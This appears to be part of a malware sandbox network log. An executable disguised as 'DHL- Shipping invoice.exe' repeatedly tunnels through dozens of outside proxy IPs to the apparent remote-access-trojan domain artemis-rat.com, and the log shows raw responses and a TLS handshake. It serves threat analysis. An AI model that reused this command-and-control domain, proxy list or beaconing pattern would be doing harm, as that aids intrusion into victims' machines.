                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            521192.168.2.450904184.178.172.18152806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.940495014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            522192.168.2.451736198.74.51.7988886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.940608978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            523192.168.2.451550103.120.6.46806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.945034027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            524192.168.2.45173298.162.25.2341456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.945400953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            525192.168.2.45173768.1.210.16341456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.950885057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            526192.168.2.451689193.239.56.8480816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.951757908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            527192.168.2.45174372.206.181.12341456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.957060099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            528192.168.2.45174272.217.158.20241456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.957216978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            529192.168.2.451437117.160.250.138806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.958360910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.453634024 CET303INHTTP/1.1 400 Bad Request
                            Server: openresty
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 154
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            530192.168.2.45098592.204.135.37229426484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.964440107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            531192.168.2.45174423.137.248.197806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.964603901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            532192.168.2.450744184.170.245.14841456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.965008020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            533192.168.2.45153558.18.43.34108006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.968096018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            534192.168.2.451747204.236.176.61806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.968707085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.132117987 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0
                            Mar 12, 2024 08:37:01.137670994 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 f0 06 1c 07 93 ef 7d e2 b8 6c ae 45 7d 04 37 34 2d 42 90 fb 9c 0e 57 9d c7 51 50 b3 d1 75 05 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: e}lE}74-BWQPu*,+0/$#('=<5/Uartemis-rat.com#
                            Mar 12, 2024 08:37:01.301486015 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 ec 7a f1 01 44 e3 3b a9 20 e7 f2 96 59 65 c4 73 b0 b0 d3 ce 7f 11 0e 11 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                            Data Ascii: =9zD; YesDOWNGRD0000*H010Uartemis-rat.com0240312064851Z260312064851Z010Uartemis-rat.com0"0*H0M^ l4_
                            Mar 12, 2024 08:37:01.303098917 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 35 b9 cb 7d 8c 05 48 3f 97 ca 2d 6e 5e bd 08 f4 15 dd 90 ad 2f 8b 25 37 ad f9 83 1a 7e 18 76 73 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 f9 ed 78 70 14 40 28 9d 16 03 47 1c 47 db be 8c 1c ab c0 a2 6e
                            Data Ascii: %! 5}H?-n^/%7~vs(xp@(GGne^U7
                            Mar 12, 2024 08:37:01.465327978 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 c4 14 68 b8 e8 aa 14 82 21 52 83 38 a2 d3 1d f0 26 06 a3 04 78 c2 2c 71 07 1a 2b 64 28 fb 65 eb f8 59 59 40 e1 f8 90 4b
                            Data Ascii: (h!R8&x,q+d(eYY@K


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            535192.168.2.45077142.193.58.9680806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.972378016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.046809912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.810641050 CET58INHTTP/1.1 200 Connection established
                            Connection: close


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            536192.168.2.450898213.136.78.200199256484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.973634958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.046811104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.140856028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.140902042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            537192.168.2.451627203.222.24.36806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.976090908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            538192.168.2.45167277.77.64.11631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.984030962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            539192.168.2.451712190.110.226.162806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.997309923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.602950096 CET811INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Server: Apache/2.4.57 (Ubuntu)
                            Content-Length: 619
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 73 6f 70 6f 72 74 65 74 69 40 63 6f 64 65 31 30 30 2e 63 6f 6d 2e 70 79 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at soporteti@code100.com.py to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.57 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            540192.168.2.45179438.54.95.1931286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.003757954 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:03.102410078 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            541192.168.2.451772178.79.165.164352546484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.004940033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.562550068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.063287973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.063092947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.062758923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            542192.168.2.451599188.124.15.1336296484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.011225939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            543192.168.2.451641102.132.54.6280806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.012177944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            544192.168.2.451935152.32.132.2204436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.013212919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            545192.168.2.450998174.77.111.19641456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.018982887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            546192.168.2.451824104.20.56.71806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.029505014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.116744995 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            547192.168.2.451715114.156.77.10780806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.066282988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.354629040 CET1286INHTTP/1.1 403 Forbidden
                            Connection: close
                            Content-Type: text/html
                            Cache-Control: no-cache
                            X-XSS-Protection: 1; mode=block
                            X-Content-Type-Options: nosniff
                            Content-Length: 4872
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 2e 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 